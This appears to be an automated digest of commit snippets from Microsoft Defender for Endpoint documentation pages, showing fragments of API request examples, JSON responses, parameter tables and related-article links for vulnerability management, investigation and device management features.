security Get All Vulnerabilities By Machines https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-all-vulnerabilities-by-machines.md
Here is an example of the response.
- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
- [Vulnerabilities in your organization](/microsoft-365/security/defender-endpoint/tvm-weaknesses)
security Get All Vulnerabilities https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-all-vulnerabilities.md
Here is an example of the response.
- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
- [Vulnerabilities in your organization](/microsoft-365/security/defender-endpoint/tvm-weaknesses)
security Get Assessment Browser Extensions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-assessment-browser-extensions.md
GET https://api.securitycenter.microsoft.com/api/machines/browserextensionsinven
- [Vulnerability management](../defender-vulnerability-management/defender-vulnerability-management.md)
- [Vulnerabilities in your organization](../defender-vulnerability-management/tvm-weaknesses.md)
security Get Assessment Information Gathering https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-assessment-information-gathering.md
GET https://api.securitycenter.microsoft.com/api/machines/InfoGatheringExport?$s
- [DeviceTvmInfoGatheringKB](../defender/advanced-hunting-devicetvminfogatheringkb-table.md)
- [Vulnerability management](../defender-vulnerability-management/defender-vulnerability-management.md)
- [Vulnerabilities in your organization](../defender-vulnerability-management/tvm-weaknesses.md)
security Get Assessment Methods Properties https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-assessment-methods-properties.md
Other related
- [Microsoft Defender Vulnerability Management](next-gen-threat-and-vuln-mgt.md)
- [Vulnerabilities in your organization](tvm-weaknesses.md)
security Get Assessment Non Cpe Software Inventory https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-assessment-non-cpe-software-inventory.md
GET https://api.securitycenter.microsoft.com/api/machines/SoftwareInventoryNonCp
Other related

- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
- [Vulnerabilities in your organization](tvm-weaknesses.md)
security Get Assessment Secure Config https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-assessment-secure-config.md
Other related
- [Microsoft Defender Vulnerability Management](next-gen-threat-and-vuln-mgt.md)
- [Vulnerabilities in your organization](tvm-weaknesses.md)
security Get Assessment Software Inventory https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-assessment-software-inventory.md
Other related
- [Microsoft Defender Vulnerability Management](next-gen-threat-and-vuln-mgt.md)
- [Vulnerabilities in your organization](tvm-weaknesses.md)
security Get Assessment Software Vulnerabilities https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-assessment-software-vulnerabilities.md
Other related
- [Microsoft Defender Vulnerability Management](next-gen-threat-and-vuln-mgt.md)
- [Vulnerabilities in your organization](tvm-weaknesses.md)
security Get Authenticated Scan Properties https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-authenticated-scan-properties.md
AuthProtocol|String (Optional)|Auth protocol to use with "SnmpAuthParams" and "A
AuthPassword|String (Optional)|Auth password to use with "SnmpAuthParams" and "AuthNoPriv" or "AuthPriv".
PrivProtocol|String (Optional)|Priv protocol to use with "SnmpAuthParams" and "AuthPriv". Possible values are "DES", "3DES", "AES".
PrivPassword|String (Optional)|Priv password to use with "SnmpAuthParams" and "AuthPriv".
security Get Browser Extensions Permission Info https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-browser-extensions-permission-info.md
Here is an example of the response.
## Other related - [Vulnerability management](../defender-vulnerability-management/defender-vulnerability-management.md)-- [Vulnerabilities in your organization](../defender-vulnerability-management/tvm-weaknesses.md)
+- [Vulnerabilities in your organization](../defender-vulnerability-management/tvm-weaknesses.md)
security Get Device Secure Score https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-device-secure-score.md
Here is an example of the response.
## See also
- [OData queries with Microsoft Defender for Endpoint](exposed-apis-odata-samples.md)
security Get Discovered Vulnerabilities https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-discovered-vulnerabilities.md
Here is an example of the response.
- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
- [Vulnerabilities in your organization](/microsoft-365/security/defender-endpoint/tvm-weaknesses)
security Get Domain Related Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-domain-related-alerts.md
Here's an example of the request.
```http
GET https://api.securitycenter.microsoft.com/api/domains/client.wns.windows.com/alerts
```
security Get Domain Related Machines https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-domain-related-machines.md
Here's an example of the request.
```http
GET https://api.securitycenter.microsoft.com/api/domains/api.securitycenter.microsoft.com/machines
```
security Get Domain Statistics https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-domain-statistics.md
Here's an example of the response.
"orgLastSeen": "2017-08-29T13:09:05Z" } ```
security Get Exposure Score https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-exposure-score.md
Here is an example of the response.
- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
- [Defender Vulnerability Management exposure score](/microsoft-365/security/defender-endpoint/tvm-exposure-score)
security Get File Information https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-file-information.md
Here's an example of the response.
"determinationValue": "PUA:Win32/FusionCore" } ```
security Get File Related Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-file-related-alerts.md
Here's an example of the request.
```http
GET https://api.securitycenter.microsoft.com/api/files/6532ec91d513acc05f43ee0aa3002599729fd3e1/alerts
```
security Get File Related Machines https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-file-related-machines.md
Here's an example of the request.
```http
GET https://api.securitycenter.microsoft.com/api/files/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/machines
```
security Get File Statistics https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-file-statistics.md
Here's an example of the response.
] } ```
security Get Installed Software https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-installed-software.md
Here is an example of the response.
- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
- [Defender Vulnerability Management software inventory](/microsoft-365/security/defender-endpoint/tvm-software-inventory)
security Get Investigation Collection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-investigation-collection.md
Here is an example of the response:
] } ```
security Get Investigation Object https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-investigation-object.md
Empty
If successful, this method returns a 200 OK response code with an [Investigations](investigation.md) entity.
security Get Ip Related Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-ip-related-alerts.md
Here is an example of the request.
```http
GET https://api.securitycenter.microsoft.com/api/ips/10.209.67.177/alerts
```
security Get Ip Statistics https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-ip-statistics.md
Here's an example of the response.
> [!NOTE]
> This statistic information is based on data from the past 30 days.
security Get Live Response Result https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-live-response-result.md
C:\\windows\\TEMP\\OfficeClickToRun.dmp.zip\n51 MB\n\u0000\u0000\u0000",
- [Get machine action API](get-machineaction-object.md)
- [Cancel machine action](cancel-machine-action.md)
- [Run live response](run-live-response.md)
security Get Machine By Id https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-machine-by-id.md
Content-type: application/json
"machineTags": [ "test tag 1", "test tag 2" ] } ```
security Get Machine Group Exposure Score https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-machine-group-exposure-score.md
Here is an example of the response.
- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
- [Defender Vulnerability Management exposure score](/microsoft-365/security/defender-endpoint/tvm-exposure-score)
security Get Machine Log On Users https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-machine-log-on-users.md
Content-type: application/json
] } ```
security Get Machine Related Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-machine-related-alerts.md
Empty
## Response
If successful and device exists: 200 OK with list of [alert](alerts.md) entities in the body. If device was not found: 404 Not Found.
security Get Machineaction Object https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-machineaction-object.md
Content-type: application/json
"relatedFileInfo": null } ```
security Get Machineactions Collection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-machineactions-collection.md
Content-type: application/json
## Related topics
- [OData queries with Microsoft Defender for Endpoint](exposed-apis-odata-samples.md)
security Get Machines By Software https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-machines-by-software.md
Here is an example of the response.
- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
- [Defender Vulnerability Management software inventory](/microsoft-365/security/defender-endpoint/tvm-software-inventory)
security Get Machines By Vulnerability https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-machines-by-vulnerability.md
Here is an example of the response.
- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
- [Vulnerabilities in your organization](/microsoft-365/security/defender-endpoint/tvm-weaknesses)
security Get Machines https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-machines.md
Content-type: application/json
## Related articles
- [OData queries with Microsoft Defender for Endpoint](exposed-apis-odata-samples.md)
security Get Missing Kbs Machine https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-missing-kbs-machine.md
Here is an example of the response.
- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
- [Defender Vulnerability Management software inventory](/microsoft-365/security/defender-endpoint/tvm-software-inventory)
security Get Missing Kbs Software https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-missing-kbs-software.md
Here is an example of the response.
- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
- [Defender Vulnerability Management software inventory](/microsoft-365/security/defender-endpoint/tvm-software-inventory)
security Get Package Sas Uri https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-package-sas-uri.md
Content-type: application/json
security Get Recommendation By Id https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-recommendation-by-id.md
Here's an example of the response.
- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
- [Defender Vulnerability Management security recommendation](/microsoft-365/security/defender-endpoint/tvm-security-recommendation)
security Get Recommendation Machines https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-recommendation-machines.md
Here is an example of the response.
- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
- [Defender Vulnerability Management security recommendation](/microsoft-365/security/defender-endpoint/tvm-security-recommendation)
security Get Recommendation Vulnerabilities https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-recommendation-vulnerabilities.md
Here is an example of the response.
- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
- [Defender Vulnerability Management security recommendation](/microsoft-365/security/defender-endpoint/tvm-security-recommendation)
security Get Remediation All Activities https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-remediation-all-activities.md
GET https://api.securitycenter.windows.com/api/remediationtasks/
- [List exposed devices of one remediation activity](get-remediation-exposed-devices-activities.md)
- [Microsoft Defender Vulnerability Management](next-gen-threat-and-vuln-mgt.md)
- [Vulnerabilities in your organization](tvm-weaknesses.md)
security Get Remediation Exposed Devices Activities https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-remediation-exposed-devices-activities.md
GET https://api.securitycenter.windows.com/api/remediationtasks/03942ef5-aecb-4c
- [List all remediation activities](get-remediation-all-activities.md)
- [Microsoft Defender Vulnerability Management](next-gen-threat-and-vuln-mgt.md)
- [Vulnerabilities in your organization](tvm-weaknesses.md)
security Get Remediation Methods Properties https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-remediation-methods-properties.md
vendorId|String|Related vendor name
- [Microsoft Defender Vulnerability Management](next-gen-threat-and-vuln-mgt.md)
- [Vulnerabilities in your organization](tvm-weaknesses.md)
security Get Remediation One Activity https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-remediation-one-activity.md
GET https://api.securitycenter.windows.com/api/remediationtasks/03942ef5-aecb-4c
- [List exposed devices of one remediation activity](get-remediation-exposed-devices-activities.md)
- [Microsoft Defender Vulnerability Management](next-gen-threat-and-vuln-mgt.md)
- [Vulnerabilities in your organization](tvm-weaknesses.md)
security Get Security Baselines Assessment Configurations https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-security-baselines-assessment-configurations.md
GET https://api.securitycenter.microsoft.com/api/baselineConfigurations
- [Export security baselines assessment](export-security-baseline-assessment.md)
- [Get security baselines assessment profiles](get-security-baselines-assessment-profiles.md)
security Get Security Baselines Assessment Profiles https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-security-baselines-assessment-profiles.md
GET https://api.securitycenter.microsoft.com/api/baselineProfiles
- [Export security baselines assessment](export-security-baseline-assessment.md)
- [Get security baselines assessment configurations](get-security-baselines-assessment-configurations.md)
security Get Security Recommendations https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-security-recommendations.md
Here is an example of the response.
- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
- [Defender Vulnerability Management security recommendation](/microsoft-365/security/defender-endpoint/tvm-security-recommendation)
security Get Software By Id https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-software-by-id.md
Here's an example of the response.
- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
- [Defender Vulnerability Management software inventory](/microsoft-365/security/defender-endpoint/tvm-software-inventory)
security Get Software Ver Distribution https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-software-ver-distribution.md
Here is an example of the response.
- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
- [Defender Vulnerability Management software inventory](/microsoft-365/security/defender-endpoint/tvm-software-inventory)
security Get Software https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-software.md
Here is an example of the response.
- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
- [Defender Vulnerability Management software inventory](/microsoft-365/security/defender-endpoint/tvm-software-inventory)
security Get Started Partner Integration https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-started-partner-integration.md
Managed security service providers (MSSP) and independent software vendors (ISV)
## Related topics
- [Technical partner opportunities](partner-integration.md)
security Get Ti Indicators Collection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-ti-indicators-collection.md
Content-type: application/json
] } ```
security Get User Related Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-user-related-alerts.md
Here is an example of the request.
```http
GET https://api.securitycenter.microsoft.com/api/users/user1/alerts
```
security Get User Related Machines https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-user-related-machines.md
Here is an example of the request.
```http
GET https://api.securitycenter.microsoft.com/api/users/user1/machines
```
security Get Vuln By Software https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-vuln-by-software.md
Here is an example of the response.
] } ```
security Get Vulnerability By Id https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-vulnerability-by-id.md
Here is an example of the response.
- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
- [Vulnerabilities in your organization](/microsoft-365/security/defender-endpoint/tvm-weaknesses)
security Gov https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/gov.md
These are the features and known gaps for [Mobile Threat Defense (Microsoft Defe
|Microsoft Defender Vulnerability Management (MDVM)|![Yes](images/svg/check-yes.svg)|![Yes](images/svg/check-yes.svg)|![Yes](images/svg/check-yes.svg)|
security Grant Mssp Access https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/grant-mssp-access.md
To implement a multi-tenant delegated access solution, take the following steps:
- [Access the MSSP customer portal](access-mssp-portal.md)
- [Configure alert notifications](configure-mssp-notifications.md)
- [Fetch alerts from customer tenant](fetch-alerts-mssp.md)
security Health Status https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/health-status.md
edr_preferred_geo : "unitedstates"
```
You can run `mdatp health --help` on recent versions to list all supported `feature`s.
security Helpful Resources https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/helpful-resources.md
Access helpful resources such as links to blogs and other resources related to
- [How automation brings value to your security teams](https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/How-automation-brings-value-to-your-security-teams/ba-p/729297)
- [Address false positives/negatives in Microsoft Defender for Endpoint](defender-endpoint-false-positives-negatives.md)
security Host Firewall Reporting https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/host-firewall-reporting.md
The query can now be executed, and all related Firewall events from the last 30
For more reporting, or custom changes, the query can be exported into Power BI for further analysis. Custom reporting can be facilitated by downloading the [Custom Reporting script](https://github.com/microsoft/MDATP-PowerBI-Templates/tree/master/Firewall) to monitor the Windows Defender Firewall activities using Power BI.
security Import Export Exploit Protection Emet Xml https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/import-export-exploit-protection-emet-xml.md
You can use Group Policy to deploy the configuration you've created to multiple
- [Evaluate exploit protection](evaluate-exploit-protection.md)
- [Enable exploit protection](enable-exploit-protection.md)
- [Configure and audit exploit protection mitigations](customize-exploit-protection.md)
security Import Ti Indicators https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/import-ti-indicators.md
Here is an example of the response.
## Related topic
- [Manage indicators](manage-indicators.md)
security Indicator Certificates https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/indicator-certificates.md
It's important to understand the following requirements prior to creating indica
- [Create indicators for IPs and URLs/domains](indicator-ip-domain.md)
- [Manage indicators](indicator-manage.md)
- [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security Indicator File https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/indicator-file.md
Microsoft Defender Vulnerability Management's block vulnerable application featu
- [Create indicators based on certificates](indicator-certificates.md)
- [Manage indicators](indicator-manage.md)
- [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security Indicator Ip Domain https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/indicator-ip-domain.md
The result is that categories 1-4 are all blocked. This is illustrated in the fo
- [Create indicators based on certificates](indicator-certificates.md)
- [Manage indicators](indicator-manage.md)
- [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security Indicator Manage https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/indicator-manage.md
Watch this video to learn how Microsoft Defender for Endpoint provides multiple
- [Create indicators for IPs and URLs/domains](indicator-ip-domain.md)
- [Create indicators based on certificates](indicator-certificates.md)
- [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security Information Protection Investigation https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/information-protection-investigation.md
Learn how to use data sensitivity labels to prioritize incident investigation.
- [Learn about sensitivity labels in Office 365](../../compliance/sensitivity-labels.md) - [Learn to apply sensitivity label inside of email or Office](https://support.microsoft.com/office/apply-sensitivity-labels-to-your-files-and-email-in-office-2f96e7cd-d5a4-403b-8bd7-4cc636bae0f9)-- [Learn how to use sensitivity labels as a condition when applying Data Loss Prevention](../../compliance/dlp-sensitivity-label-as-condition.md)
+- [Learn how to use sensitivity labels as a condition when applying Data Loss Prevention](../../compliance/dlp-sensitivity-label-as-condition.md)
security Initiate Autoir Investigation https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/initiate-autoir-investigation.md
POST https://api.security.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e41
"Comment": "Test investigation" } ```
security Internet Facing Devices https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/internet-facing-devices.md
You can report an inaccuracy for a device with incorrect internet-facing informa
## See also
- [Device inventory](machines-view-overview.md)
security Investigate Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/investigate-alerts.md
If you are experiencing a false alert with a line-of-business application, creat
- [Investigate an IP address associated with a Defender for Endpoint alert](investigate-ip.md)
- [Investigate a domain associated with a Defender for Endpoint alert](investigate-domain.md)
- [Investigate a user account in Defender for Endpoint](investigate-user.md)
security Investigate Behind Proxy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/investigate-behind-proxy.md
DeviceNetworkEvents
## Related articles
- [Applying network protection with GP - policy CSP](/windows/client-management/mdm/policy-csp-defender#defender-enablenetworkprotection)
security Investigate Domain https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/investigate-domain.md
Using the export button above the table, you can export all the data into a .csv
- [Investigate devices in the Microsoft Defender for Endpoint Devices list](investigate-machines.md)
- [Investigate an IP address associated with a Microsoft Defender for Endpoint alert](investigate-ip.md)
- [Investigate a user account in Microsoft Defender for Endpoint](investigate-user.md)
security Investigate Files https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/investigate-files.md
The file capabilities view lists a file's activities as mapped to the MITRE ATT&
- [Investigate an IP address associated with a Microsoft Defender for Endpoint alert](investigate-ip.md) - [Investigate a domain associated with a Microsoft Defender for Endpoint alert](investigate-domain.md) - [Investigate a user account in Microsoft Defender for Endpoint](investigate-user.md)-- [Take response actions on a file](respond-file-alerts.md)
+- [Take response actions on a file](respond-file-alerts.md)
security Investigate Incidents https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/investigate-incidents.md
You can click the circles on the incident graph to view the details of the malic
- [Incidents queue](/microsoft-365/security/defender-endpoint/view-incidents-queue)
- [Investigate incidents in Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/investigate-incidents)
- [Manage Microsoft Defender for Endpoint incidents](/microsoft-365/security/defender-endpoint/manage-incidents)
security Investigate Ip https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/investigate-ip.md
Clicking any of the device names will take you to that device's view, where you
- [Investigate devices in the Microsoft Defender for Endpoint Devices list](investigate-machines.md)
- [Investigate a domain associated with a Microsoft Defender for Endpoint alert](investigate-domain.md)
- [Investigate a user account in Microsoft Defender for Endpoint](investigate-user.md)
security Investigate Machines https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/investigate-machines.md
To gain an in-depth view of the device health report, you can go to **Reports >
- [Investigate a domain associated with a Defender for Endpoint alert](investigate-domain.md) - [Investigate a user account in Defender for Endpoint](investigate-user.md) - [Security recommendation](tvm-security-recommendation.md)-- [Software inventory](tvm-software-inventory.md)
+- [Software inventory](tvm-software-inventory.md)
security Investigate User https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/investigate-user.md
You can filter the results by the following time periods:
- [Investigate devices in the Defender for Endpoint Devices list](investigate-machines.md)
- [Investigate an IP address associated with a Defender for Endpoint alert](investigate-ip.md)
- [Investigate a domain associated with a Defender for Endpoint alert](investigate-domain.md)
security Investigation https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/investigation.md
triggeringAlertId|String|The ID of the alert that triggered the investigation.
"triggeringAlertId": "da637139127150012465_1011995739" } ```
security Ios Configure Features https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/ios-configure-features.md
Use the following steps to configure the option to send feedback data to Microso
## Report unsafe site
Phishing websites impersonate trustworthy websites for the purpose of obtaining your personal or financial information. Visit the [Provide feedback about network protection](https://www.microsoft.com/wdsi/filesubmission/exploitguard/networkprotection) page to report a website that could be a phishing site.
security Ios Install Unmanaged https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/ios-install-unmanaged.md
Microsoft Defender for Endpoint on iOS enables the app protection policy scenari
When app protection policies are configured for apps to include device risk signals from Microsoft Defender for Endpoint, users are redirected to install Microsoft Defender for Endpoint when they use such apps. Alternatively, users can install the latest version of the app directly from the Apple App Store. For MAM registration to succeed, ensure the device is registered in Authenticator with the same account that is used to onboard to Defender.
security Ios Install https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/ios-install.md
Admins can configure auto-setup of VPN profile. This will automatically set up t
- [Configure app protection policy to include Defender for Endpoint risk signals (MAM)](ios-install-unmanaged.md)
- [Configure Defender for Endpoint on iOS features](ios-configure-features.md)
security Ios Privacy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/ios-privacy.md
Feedback Data is collected through in-app feedback provided by the user.
- Feedback type (smile, frown, idea) and any feedback comments submitted by the user.

For more information, see [More on Privacy](https://aka.ms/mdatpiosprivacystatement).
security Ios Troubleshoot https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/ios-troubleshoot.md
If a user faces an issue which isn't already addressed in the above sections or
- Choose from the given options. To report an issue, select **I don't like something**.
- Provide details of the issue that you're facing and check **Send diagnostic data**. We recommend that you include your email address so that the team can contact you for a solution or a follow-up.
- Tap **Submit** to successfully send the feedback.
security Ios Whatsnew https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/ios-whatsnew.md
On January 25, 2022, we announced the general availability of Vulnerability mana
- With this version, we are announcing support for iPadOS/iPad devices.
- Bug fixes.
security Isolate Machine https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/isolate-machine.md
POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2
```
- To release a device from isolation, see [Release device from isolation](unisolate-machine.md).
security Limited Periodic Scanning Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/limited-periodic-scanning-microsoft-defender-antivirus.md
Sliding the switch to **On** will show the standard Microsoft Defender Antivirus
> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md) > - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) > - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
+> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Linux Deploy Defender For Endpoint With Chef https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-deploy-defender-for-endpoint-with-chef.md
then
end
end
```
security Linux Exclusions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-exclusions.md
For example, to add `EICAR-Test-File (not a virus)` (the threat name associated
```bash
